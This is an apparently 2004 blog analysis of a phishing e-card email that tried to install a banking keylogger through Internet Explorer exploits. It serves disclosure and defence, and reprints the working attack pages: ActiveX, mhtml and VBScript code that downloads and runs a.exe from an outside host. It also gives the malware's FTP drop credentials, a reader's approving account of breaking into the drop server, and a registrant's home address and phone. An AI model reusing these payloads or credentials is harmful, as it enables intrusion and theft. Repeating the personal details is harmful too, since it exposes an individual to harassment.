E-card Hijack Spam
Introduction
I got an email on February 15th, 2004 telling me I had received an e-card from someone at 123greetings.com. The email looked a little bit suspicious, since the sender of the ecard (kissmytearsx@comcast.net) was someone I didn't recognize, and the URL to view the card showed the root domain of 123greetings.com. However, being the lonely geek I am, I clicked on the link hoping that I had a secret admirer who had emailed me a card for valentines day...
The page opened in my browser, but nothing happened. Lucky for me, I wasn't using Internet Explorer so I was saved. A closer look at the email and URL revealed an attempt to use IE exploits to hijack the computer and install a trojan that steals sensitive information including passwords and bank account numbers.
It has been pointed out to me that the email says that you sent a card, not received one. I should have noticed this and realized I hadn't sent any cards to anyone.
Feb 16th: This article was Slashdotted
Feb 19th: This article has shown up all over the internet, on sites such as technologyreview.com and spamisbad.com.
The E-mail
There are several things to notice about the following email. Starting at the beginning, the email was sent from a DSL account in Poland - definitely did not come from the 123greetings.com servers. The from, reply-to, sender and return-path headers are obviously fake.
A comment in the HTML content of the email shows that it was saved from http://d40921.u24.whp-server.com/card.htm, where a copy of what is presumably the original email still exists. The title tag is set to "Untitled Document", and a META tag indicates that the html was generated using a microsoft product.
The URL view-source:http://210.192.42.34/img/ [warning, don't click unless you know what you're doing] appears through the rest of the email. All the links have been changed to point to this URL, and a 0x0 iframe at the end of the email also opens it up.
From ecard@123greetings.com Sun Feb 15 11:13:52 2004
Return-Path: <ecard@123greetings.com>
Delivered-To: MYEMAIL
Received: from localhost (localhost [127.0.0.1]) by mail.tjhsst.edu
(Postfix) with ESMTP id 99462A2C1A for <MYEMAIL>; Sun, 15 Feb
2004 11:13:52 -0500 (EST)
Received: from mail.tjhsst.edu ([127.0.0.1]) by localhost (macaroni
[127.0.0.1]) (amavisd-new, port 20025) with ESMTP id 01846-06 for
<MYEMAIL>; Sun, 15 Feb 2004 11:13:52 -0500 (EST)
Received: from mail.zoneedit.com (mail.zoneedit.com [209.152.174.160]) by
mail.tjhsst.edu (Postfix) with ESMTP id AF227A2C19 for <MYEMAIL>;
Sun, 15 Feb 2004 11:13:51 -0500 (EST)
Received: from compuserve.com (rk160.neoplus.adsl.tpnet.pl [80.50.83.160])
by mail.zoneedit.com (Postfix) with SMTP id C84213EBB8 for
<MYEMAIL>; Sun, 15 Feb 2004 11:13:48 -0500 (EST)
Date: Sun, 15 Feb 2004 16:16:50 +0000
From: Ecard <ecard@123greetings.com>
Subject: You have received E-card at 123Greetings.com
To: ME <MYEMAIL>
Message-ID: <2BK7DCI33AK80CAE@123greetings.com>
Reply-To: Ecard <ecard@123greetings.com>
Sender: Ecard <ecard@123greetings.com>
MIME-Version: 1.0
Content-Type: text/html; charset=Windows-1251
X-Virus-Scanned: by amavisd-new-20030616-p5 (Debian) at macaroni
X-Spam-Status: No, hits=4.3 tagged_above=2.0 required=6.3 tests=HTML_30_40,
HTML_COMMENT_SAVED_URL, HTML_MESSAGE, HTML_RELAYING_FRAME,
HTML_TITLE_UNTITLED, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,
RCVD_FAKE_HELO_DOTCOM
X-Spam-Level: ****
Content-Transfer-Encoding: 8bit
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0041)http://d40921.u24.whp-server.com/card.htm -->
<HTML><HEAD><TITLE>Untitled Document</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2737.800" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff><PRE>Dear Admirer,
Your e-card has been sent to My... at kissmytearsx@comcast.net
123Greetings.com is all about touching lives, bridging distances, healing rifts
and building bonds. We have a gallery of e-cards for almost every occasion of
life. Express yourself to your friends and family by sending Free e-cards from
our site with your choice of colors, words and music.
Your e-card will be available with us for the next 30 days. If you wish to keep
the e-card longer, you may save it on your computer or take a print.
To view a copy of the e-card you have sent, choose from any of the following
options:
--------
OPTION 1
--------
Click on the following Internet address or
copy & paste it into your browser's address box.
<A href="http://210.192.42.34/img/">http://www.123greetings.com/</A>
--------
OPTION 2
--------
Copy & paste the e-card number in the "View Your Card" box at
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
Your e-card number is
7CU20121085738151
If you need help in viewing your e-card or any other assistance,
please visit our Help / FAQ section located at
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/help/</A>
If you need further help, feel free to write to us at
<A href="mailto:%20support@123greetings.com">mailto:%20support@123greetings.com</A>
Best wishes,
Postmaster,
123Greetings.com
*If you would like to send someone an e-card, you can do so at
<A href="http://210.192.42.34/img/">http://ww.123greetings.com/</A>
<IFRAME SRC="http://210.192.42.34/img/" height="0" width="0">gf</iframe>
</PRE></BODY></HTML>
The Offending URL
The URL, whose HTML source is reproduced below, does some really nasty stuff. Using iframes, object tags and javascript, it opens up several other files, which are explained later on, from the server:
- view-source:http://210.192.42.34/img/spy.htm
- view-source:http://210.192.42.34/img/start.html
- view-source:http://210.192.42.34/img/ro.htm
- view-source:http://210.192.42.34/img/1.php
In addition to opening other URLs, the page also does its own share of nasty things. It includes a hidden textarea which contains ActiveX to download a certain a.exe, and overwrite the Windows Media Player wmplayer.exe with it. Once the file has been replaced, IE is redirected to the mms://, which causes the invocation of wmplayer.exe. The code in this textarea is processed by some javascript after a 5 second timeout, and is run in Internet Explorer's 'Media Sidebar'. Before this 5 second timeout, however, a fake url, error.jsp, is opened in the media sidebar to throw off the user.
<iframe src="spy.htm" height="0" width="0">f</iframe>
<iframe src="start.html" height="0" width="0">f</iframe>
<iframe src="ro.htm" height="0" width="0">f</iframe>
<object data="1.php"></object>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
spy.htm - I wonder what this does?
Despite its malicous sounding name, all this file contains is the tracking code provided by a russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.
<!-- SpyLOG f:0211 -->
<script language="javascript"><!--
Mu="u5327.08.spylog.com";Md=document;Mnv=navigator;Mp=0;
Md.cookie="b=b";Mc=0;if(Md.cookie)Mc=1;Mrn=Math.random();
Mn=(Mnv.appName.substring(0,2)=="Mi")?0:1;Mt=(new Date()).getTimezoneOffset();
Mz="p="+Mp+"&rn="+Mrn+"&c="+Mc+"&t="+Mt;
if(self!=top){Mfr=1;}else{Mfr=0;}Msl="1.0";
//--></script><script language="javascript1.1"><!--
Mpl="";Msl="1.1";Mj = (Mnv.javaEnabled()?"Y":"N");Mz+='&j='+Mj;
//--></script><script language="javascript1.2"><!--
Msl="1.2";Ms=screen;Mpx=(Mn==0)?Ms.colorDepth:Ms.pixelDepth;
Mz+="&wh="+Ms.width+'x'+Ms.height+"&px="+Mpx;
//--></script><script language="javascript1.3"><!--
Msl="1.3";//--></script><script language="javascript"><!--
My="";My+="<a href='http://"+Mu+"/cnt?cid=532708&f=3&p="+Mp+"&rn="+Mrn+"'
target='_blank'>";
My+="<img src='http://"+Mu+"/cnt?cid=532708&"+Mz+"&sl="+Msl+
"&r="+escape(Md.referrer)+"&fr="+Mfr+"&pg="+escape(window.location.href);
My+="' border=0 width=88 height=31 alt='SpyLOG'>";
My+="</a>";Md.write(My);//--></script><noscript>
<a href="http://u5327.08.spylog.com/cnt?cid=532708&f=3&p=0" target="_blank">
<img src="http://u5327.08.spylog.com/cnt?cid=532708&p=0" alt='SpyLOG'
border='0' width=88 height=31 >
</a></noscript>
<!-- SpyLOG -->
start.html - The file that ran away
Presumably, this file actually existed at one point, and did something (maybe changed the browsers start page?), but it no longer exists.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /img/start.html was not found on this server.<P> <HR> <ADDRESS>Apache/1.3.12 Server at panda.coventive.com Port 80</ADDRESS> </BODY></HTML>
ro.html - Remote execution
The author tries yet another IE exploit to run a.exe remotely.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111113'
CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://adversting.co.uk/a.exe")
</script>
</head>
<body>
<font size="6"><font size="2"><big><big><big>
<big>HijackClickV2-MyPage</big></big>
</big></big><b><i><br>
<br>
</body>
</html>
1.php - Last Attempt
1.php tries one last method to run a.exe. The file contains vbscript code, but probably uses php so that it can send a 'application/hta' content-type header. The encoded vbscript has been removed (view it at view-source:http://210.192.42.34/img/1.php) and replaced with the deocded version of the code.
The vbscript code contains strings which represent, in hex, the binary contents of a certain executable which is saved as x.exe. Once saved, this executable is launched with the url to a.exe as an argument.
<html>
<script language=vbs>
szURL = "http://adversting.co.uk/a.exe"
</script>
<script language="VBScript.Encode">
<%
szZeroLine =
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary &
"4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000"
szBinary = szBinary &
"000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F"
szBinary = szBinary &
"742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21"
szBinary = szBinary &
"97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300"
szBinary = szBinary &
"AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000"
szBinary = szBinary &
"001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000"
szBinary = szBinary &
"000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine
szBinary = szBinary &
"2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000"
szBinary = szBinary &
"BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000"
szBinary = szBinary &
"0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
"00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000"
szBinary = szBinary &
"00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020"
szBinary = szBinary &
"4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary &
"66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000"
szBinary = szBinary &
"0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072"
szBinary = szBinary &
"6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164"
szBinary = szBinary &
"4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine
szBinary = szBinary &
"000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F"
szBinary = szBinary &
"776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000"
szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine &
szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000"
szApplication = "c:\x.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
intLength = len(szBinary)
intPosition = 1
while intPosition < intLength
char = Int("&H" & Mid(szBinary, intPosition, 2))
hFile.Write(Chr(char))
intPosition = intPosition+2
wend
hFile.Close
Set hShell=CreateObject("WScript.Shell")
hShell.run(szApplication+" "+szURL)
%>
</script>
x.exe - The Accomplice
I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free, and be sure to email me anything you find so that I can update this page.
Feb 16th, 12PM: According to Robert Myers, x.exe isn't a valid Windows executable, and doesn't run properly on either XP or 98. Looking at the raw binary, the intent is to simply download the URL given on the command line and execute it. It should download a.exe, call it c:\y.exe and run it.
Feb 16th, 3PM: Slashdot reader James Sneeringer emailed me the following update:
As you know, 1.php decodes into x.exe. It's quite small, only 2512 bytes. When run, it evidently attempts to download whatever URL is passed to it, (using URLDownloadToFileA()) and saves it to c:\y.exe, when tries to run it (using WinExec()). So x.exe downloads a.exe as y.exe and runs it. I obtained a.exe from the URL in 1.php, http://adversting.co.uk/a.exe. The a.exe file appears to be a keylogger, as the string "key.log" is contained in it. It contains calls to RegCreateKeyExA(), MessageBoxA(), and InternetOpenA(), so it probably does the usual trojan/worm thing... ensures it starts up on reboot, prints misleading error messages, phones home, etc. I have not run any of these programs. I have only analyzed them on a Linux system using the strings command. I did copy a.exe to a Windows system running Norton AntiVirus, but it didn't flag it as any known Trojan or SpyWare. I obtained x.exe by converting the VBScript code to perl. I hope this helps.
a.exe - Final Destination
Feb 16th, 3:30PM: I've gotten several emails providing information about a.exe (md5sum e8262377158e2b0b3932292f49fd23a6).
Robert Myers reports that the exe has references to spy.dll and keylg.dll
John reports:
I analyzed the a.exe and found disturbing info: it is after banks, as described in an unpacked version (the file is compacted). Bank list is as follows: hangseng.HSBC.bank.PIN.ufjbank.smbc.co.jp.btm.co.jp. rhbbank.com.ambg.com.my.affinbank.com.my.publicbank.com.my. Shinsei.jbic.go.jp.boj.or.jp.sanwabank.co.jp.stormpay.com. ccbusa.com.goldmoney.e-gold.e-bullion.tradeodds.com. datek.betonmarket.com.evocash.bancaja.es.santandercentralhispano.es. bancopopular.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.cme.com.fxall.com. bank.banc.e-gold.evocash.e-bullion.hangseng.HSBC.PIN.smbc.co.jp. btm.co.jp.rhbbank.com.ambg.com.my.Shinsei.jbic.go.jp.jbic.go.jp. stormpay.com.ccbusa.com.goldmoney.tradeodds.com.datek.betonmarket.com. santandercentralhispano.es.cajamadrid.es.caixapenedes.es.caixamanresa.es. caixatarragona.es.bot.or.th.banque.bnm.gov.my.dnb.nl. bundesbank.de.TAN.ecb.int.mas.gov.sg.snb.ch.federalreserve.gov. abnamro.com.aib.ie.bnl.it.ingbarings.com.bankofamerica.com. bmonesbittburns.com.barcap.com.bearstearns.com.bnpparibas.com. chase.com.consors.de.ca-indosuez.com.creditlyonnais.com.csfb.com. firstunion.com.intesabci.it.jp morgan.com.leuveninc.com.ldc.co.uk. nabmarkets.com.nomura.com.rbsmarkets.com.sakura.co.jp. salomonsmithbarney.com.scotiacapital.com.sg-ib.com.standardchartered.com. smbc.co.jp.csweb.co.jp.td.com.travelex.com.ubs.com.wachovia.com. wellsfargo.com.westlbmarkets.net.saxobank.com.e-trade.admin.clearstation.com. daytraders.com.decisionpoint.com.earningswhispers.com.investools.com. nni.nikkei.co.jp.stockwinners.com.tradetrek.com.brownco-apply.com. schwabtrader.com.processrequest.com.anz.com.olb.westpac.commbank.com.au. ambg.com.my.bpm.com.my.bcb.com.my.hhb.com.my.borneo-online.com.my.rba.gov.au. panamaoffshore.com.eib.org.offshore.53.com.amex.com.money.net.st.rim.or.jp. meigin.com.it-okinawa.or.jp.chb.com.tw.www2.japanexim.go.jp.www.gs.com. juroku.co.jp.iijnet.or.jp.mitsubishi-trust.co.jp.msdw.co.jp.ncb.co.jp. hirogin.co.jp.clariden.com.dahsing.com.hk.iba.com.hk.worldsec.com. unicredito.it.rzb.at.mevas.com.ibnk.bcif.fr.rzb.at.smc.fr. www.socgen.com.www.westlb.com.www.boh.com.cib.ibanking-services.com. internetonline2.com.agrolink.moa.my.maybank2u.com.my.bankrakyat.com. my.nwabank.co.jp.ufjbank.parex.ogress.banco The files it installs are: C:\WINDOWS\SYSTEM\~key.log keylogging file ? C:\WINDOWS\SYSTEM\~post.log other post file ? Files it refers to: spy.dll klgd.dll Interesting info about the author: g:\!Work\__Current\$0000_FHooker_Chazer\Release\TrojWithHooker.pdb g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Release\DLL.pdb ProgLib.dll._Prog_HookAllApps@12 MoneyFtp (???) The information (logfiles) is send out to an FTP site that is UP as of yet. I informed the abuse department of the hosters of the FTP site and am giving them a chance to shut it down. It is not yet wise to include this particular information on your site, as there could be consequences for the people whose log is already collected.
And Jack emailed me:
I downloaded a.exe out of curiousity, and have been analysing it. The file contains a number of very interesting strings, which make it quite obvious that this program attempts to hijack the user's personal login information as they log in to various popular Internet banking services. The strings are (trivially) encrypted. However, once every character in a.exe is XOR'ed with 255, they appear. I have listed them below. Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE. 64.191.23.212 21 ircd thepassw0rd https http Internet Explorer Opera 69.93.102.218 21 logi bbzaza123 hangseng HSBC bank ufjbank smbc.co.jp btm.co.jp rhbbank.com ambg.com.my affinbank.com.my publicbank.com.my Shinsei jbic.go.jp boj.or.jp sanwabank.co.jp stormpay.com ccbusa.com goldmoney ... continues in similar vein, with 152 more strings. I have found this very scary. I cannot believe how openly malicious this program actually is.
Feb 19th, 6PM: An anonymous hacker (hacker = good, cracker = bad) did us all a favor:
I logged in to the second FTP site that the malicious program sends the
account numbers to. I found it to be a rooted Linux box, where the
spammers had installed lots of unpleasant software, including email
address harvesters. A rather large number of account numbers had
also accumulated.
I deleted all the account numbers I could find, and then crashed the
computer. I believe that this was the best course of action to take,
given what was happening. Now, I hope, the sysadmin will take appropriate
action and patch his system. The machine is still down.
adversting.co.uk - Look, it's misspelt
Feb 16th, 12PM: Mike Richards did some research on the domain that a.exe is being pulled from. Here's what he found:
The site is registered in the UK and points to another mass marketing company called trafficdiscount.com. They are located in the US and their registration details are:
Registrant Name: Daniel Belcher Registrant Organization: Slick Website Development Registrant Address: 1111 Kathryn Rd. Registrant City: Mt. Juliet Registrant State/Province: TN Registrant Postal Code: 37122 Registrant Country: US Registrant Phone Number: +61.54434190 Registrant Fax Number: +. Registrant Email: daniel@s-w-d.net
They are currently providing services through Wiltel.
Jason D. did some research on s-w-d.net and found:
Registrant:
Daniel Belcher (S-W-D-NET-DOM)
Slick Website Development
1111 Kathryn Rd.
Mt. Juliet, TN 37122
US
615-443-4190
615-444-5804
danielbelcher@worldnet.att.net
Domain Name: S-W-D.NET
Administrative Contact:
Daniel Belcher danielbelcher@worldnet.att.net
1111 Kathryn Rd.
Mt. Juliet, TN 37122
US
615-443-4190
Fax- 615-444-5804
Technical Contact, Zone Contact:
Daniel Belcher danielbelcher@worldnet.att.net
1111 Kathryn Rd.
Mt. Juliet, TN 37122
US
615-443-4190
Fax- 615-444-5804
Record last updated on 08-Apr-2003.
Record expires on 10-Nov-2007.
Record created on 10-Nov-2000.
Domain servers in listed order:
Name Server: ns1.slickwebsitedevelopment.com
Name Server: ns2.slickwebsitedevelopment.com
It appears that the 'registrant phone number' for adversting.co.uk is
misformatted and should really be 615-443-4190.
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=615-443-4190&btnG=Google+Search
Googling on this phone number also produces a 'Mary Belcher' at the same
address.
I don't know what this person's involvement is but it appears that they
are at least somewhat for real.
Feb 19th, 6PM: Ryan from Australia emailed me:
About November last year one of our
machines started doing strange things, so we went up and had a look at it.
It had something running in the background. We think it was a mail relay
trojan. We traced it back and that had been downloaded from
advertising.co.uk. The infected machine was sending out packets and
packets were trying to get back in, but were blocked by the firewall. If
it hadn't been 7pm at night, I probably would have set up a sniffer and
grabbed some info, but instead I cleaned things off and went home.
Looks like that site is not a nice one and I think I'll add it to my list
of sites to avoid.
Conclusion
If you're still using Outlook and Internet Explorer, this is a good time to find alternatives ( I suggest FireFox [download] and ThunderBird [download] ). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.